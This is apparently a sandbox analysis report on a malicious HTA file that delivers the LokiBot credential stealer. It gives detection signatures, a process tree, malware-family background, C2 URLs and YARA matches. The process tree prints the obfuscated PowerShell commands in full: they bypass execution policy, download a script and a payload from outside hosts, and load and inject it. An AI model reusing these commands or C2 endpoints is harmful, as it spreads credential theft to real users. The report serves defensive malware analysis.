Edit tour

Windows Analysis Report
bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta

Overview

General Information

Sample name:	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta
Analysis ID:	1556630
MD5:	5476ba599869d81abee08f38f1c1a1d9
SHA1:	46748779ec123145fdf90942c9df65d0099c9a99
SHA256:	ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Cobalt Strike Beacon

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected HtmlPhish44

Yara detected Lokibot

Yara detected Powershell download and execute

Yara detected Strela Stealer

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Obfuscated command line found

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected aPLib compressed binary

Compiles C# or VB.Net code

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: AspNetCompiler Execution

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6676 cmdline: mshta.exe "C:\Users\user\Desktop\bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 6884 cmdline: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 5104 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 4408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF0FC.tmp" "c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 7068 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

aspnet_compiler.exe (PID: 2736 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.95/simple/five/fre.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x75288:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x62653:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x70e97:$des3: 68 03 66 00 00 0x75288:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x75354:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000D.00000002.2893956116.0000000001528000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: powershell.exe PID: 2504	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x32aa8:$b2: ::FromBase64String( 0xe7052:$b2: ::FromBase64String( 0x100af0:$b2: ::FromBase64String( 0x101143:$b2: ::FromBase64String( 0x101c39:$b2: ::FromBase64String( 0x102efe:$b2: ::FromBase64String( 0x103663:$b2: ::FromBase64String( 0x103fe4:$b2: ::FromBase64String( 0x1046bc:$b2: ::FromBase64String( 0x65d8:$b3: ::UTF8.GetString( 0x6f53:$b3: ::UTF8.GetString( 0x7fb5:$b3: ::UTF8.GetString( 0x8add:$b3: ::UTF8.GetString( 0x298a6:$b3: ::UTF8.GetString( 0x2a276:$b3: ::UTF8.GetString( 0x2abf2:$b3: ::UTF8.GetString( 0x2b84b:$b3: ::UTF8.GetString( 0x2c512:$b3: ::UTF8.GetString( 0x2d0d9:$b3: ::UTF8.GetString( 0x2e9dd:$b3: ::UTF8.GetString( 0x529c8:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 5820	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: powershell.exe PID: 5820	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
Process Memory Space: powershell.exe PID: 5820	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: powershell.exe PID: 5820	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 5820	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3f76fc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: powershell.exe PID: 5820	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x16ba:$b2: ::FromBase64String( 0x1d80:$b2: ::FromBase64String( 0x779c:$b2: ::FromBase64String( 0xd2b3:$b2: ::FromBase64String( 0xd979:$b2: ::FromBase64String( 0xb8409:$b2: ::FromBase64String( 0xeec51:$b2: ::FromBase64String( 0xef317:$b2: ::FromBase64String( 0x152347:$b2: ::FromBase64String( 0x1533f4:$b2: ::FromBase64String( 0x154be9:$b2: ::FromBase64String( 0x195a77:$b2: ::FromBase64String( 0x19612a:$b2: ::FromBase64String( 0x3faba8:$b2: ::FromBase64String( 0x3fb26e:$b2: ::FromBase64String( 0x3fcbe5:$b2: ::FromBase64String( 0xa01a5f:$b2: ::FromBase64String( 0xa028e2:$b2: ::FromBase64String( 0xa02fb3:$b2: ::FromBase64String( 0xa04c16:$b2: ::FromBase64String( 0xa7ac07:$b2: ::FromBase64String(
Process Memory Space: aspnet_compiler.exe PID: 2736	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 2736	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 2736	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 2736	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x4056:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.powershell.exe.6a69e98.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.powershell.exe.6a69e98.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.powershell.exe.6a69e98.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.powershell.exe.6a69e98.0.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
9.2.powershell.exe.6a69e98.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
13.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
13.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
13.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
13.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
13.2.aspnet_compiler.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
13.2.aspnet_compiler.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
13.2.aspnet_compiler.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
13.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
